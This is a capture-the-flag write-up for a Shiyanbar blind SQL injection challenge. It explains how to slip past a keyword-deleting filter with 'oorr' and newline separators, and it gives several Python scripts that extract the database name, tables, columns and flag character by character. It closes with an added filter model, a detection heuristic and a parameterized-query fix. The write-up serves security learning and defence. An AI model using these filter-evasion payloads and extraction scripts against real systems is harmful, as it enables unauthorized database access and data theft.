Be a bit more serious! - 实验吧

Time: 2019-09-11 10:40:00  Source: IT技术  Author: seo实验室小编  Reads: 89

Be serious

This challenge is really a boolean-based blind injection. Put simply: a normal query returns "you are in", an error returns "you are not in", and triggering the WAF returns "sql injection detected".

Then I fuzzed it a bit; I won't paste the screenshots, since I forgot to take them while solving.

The result is roughly that and, space, comma, union and + are filtered.

There is a pitfall here: during fuzzing, or was usable, but when I tried id = 1'/**/or/**/'1'='1 the response was "you are not in", which shouldn't happen.

After a few tries, it seems the back end deletes or wherever it matches it (rather than rejecting the request), so writing oorr solves it: once the inner or is deleted, what remains is or.

What remains is plain boolean-based blind injection.

First, find the length of the database name

import requests

print("start")
marker = "You are in"   # response text that means the injected condition was true
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"   # trailing space removed from the URL
for i in range(1, 30):
    # "oorr" survives the filter: the inner "or" is deleted, leaving "or"
    key = {'id': "0'oorr(length(database())=%s)oorr'0" % i}
    res = requests.post(url, data=key).text
    print(i)
    if marker in res:
        print('database length: %s' % i)
        break
print("end!")

18 characters; next, dump the database name

import requests

marker = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
# raw string: the original "\{" was an invalid escape sequence
guess = r"abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]._"
database = ''
print('start')
for i in range(1, 19):
    for j in guess:
        # mid(database() from i for 1): "foorr" becomes "for" once the filter deletes "or"
        key = {'id': "0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" % (i, j)}
        res = requests.post(url, data=key).text
        print('............%s......%s.......' % (i, j))
        if marker in res:
            database += j
            break
print(database)
print("end!")

Length of the table names

import requests

marker = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
i = 1
print("start")
while True:
    # "separatoorr" -> "separator", "foorr" -> "for", "infoorrmation_schema" -> "information_schema"
    # after the filter deletes the inner "or" of each
    res = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0" % i
    res = res.replace(' ', chr(0x0a))   # space is filtered; a newline works as a separator
    key = {'id': res}
    r = requests.post(url, data=key).text
    print(i)
    if marker in r:
        # mid() returns '' only once i is past the last character
        print("length: %s" % (i - 1))
        break
    i += 1
print("end!")

Table names (the names are separated with @ here; there are two tables)

import requests

marker = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = r"abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
table = ""
print("start")
for i in range(1, 12):
    for j in guess:
        # same query as the length probe, but comparing position i against each candidate character
        res = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0" % (i, j)
        res = res.replace(' ', chr(0x0a))   # space is filtered; newline as separator
        key = {'id': res}
        r = requests.post(url, data=key).text
        print(i)
        if marker in r:
            table += j
            break
print(table)
print("end!")

Length of the column names

import requests

marker = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
i = 1
print("start")
while True:
    # same trick against information_schema.columns for the table found above
    res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='')oorr'0" % i
    res = res.replace(' ', chr(0x0a))   # space is filtered; newline as separator
    key = {'id': res}
    r = requests.post(url, data=key).text
    print(i)
    if marker in r:
        # mid() returns '' only once i is past the last character
        print("length: %s" % (i - 1))
        break
    i += 1
print("end!")

Column names

import requests

marker = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = r"abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
column = ""
print("start")
for i in range(1, 6):
    for j in guess:
        res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0" % (i, j)
        res = res.replace(' ', chr(0x0a))   # space is filtered; newline as separator
        key = {'id': res}
        r = requests.post(url, data=key).text
        print("......%s.........%s........." % (i, j))
        if marker in r:
            column += j
            break
print(column)
print("end!")

Obviously a flag table with a flag column; just dump it

import requests

marker = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
# note: the charset contains no space (see the remark below)
guess = r"abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
flag = ""
print("start")
for i in range(1, 20):
    for j in guess:
        res = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0" % (i, j)
        res = res.replace(' ', chr(0x0a))   # space is filtered; newline as separator
        key = {'id': res}
        r = requests.post(url, data=key).text
        # print("........%s..........%s........" % (i, j))
        if marker in r:
            flag += j
            print(flag)
            break
print(flag)
print("end!")

flag get √

There is one mistake here, though: I didn't include the space in the charset, and that minus sign is actually a space, lol
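As an added defender-side example (not code from the writeup): a small model of the filter described above, showing why deleting or once lets oorr through, a canonicalizing check that flags the evasions used here (comments and newlines as separators, keyword stuffing), and the parameterized query that removes the problem at the root. The filter model and the sqlite3 users table are assumptions constructed for the example.

```python
import re
import sqlite3

# Constructed model of the challenge's filter as the writeup describes it:
# "and", space, comma, "union" and "+" are rejected outright, while "or" is
# deleted in one pass. Deleting instead of rejecting is the weakness: "oorr"
# loses its inner "or" and collapses back to "or".
REJECTED = ("and", " ", ",", "union", "+")
KEYWORDS = ("or", "and", "union")

def challenge_filter(value):
    """Return what the back end would see, or None if the WAF rejects it."""
    if any(tok in value.lower() for tok in REJECTED):
        return None
    return re.sub(r"or", "", value, flags=re.IGNORECASE)

def is_suspicious(value):
    """Detection heuristic for the evasions used in the writeup: inline
    comments or newlines standing in for spaces, and keyword stuffing
    that still contains a keyword after a single deletion pass."""
    v = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)   # /**/ acts as a space
    v = re.sub(r"\s", " ", v)                          # \n (0x0a) acts as a space
    if v != value:
        return True
    once = v.lower()
    for kw in KEYWORDS:
        once = once.replace(kw, "")                    # one deletion pass, like the WAF
    return any(kw in once for kw in KEYWORDS)          # "oorr" -> "or" survives

def make_db():
    """In-memory stand-in for the challenge database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO users VALUES ('1', 'alice')")
    return conn

def lookup(conn, user_id):
    """The actual fix: a parameterized query. The id is bound as data, so no
    amount of keyword mangling turns it into SQL."""
    row = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()
    return row[0] if row else None
```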
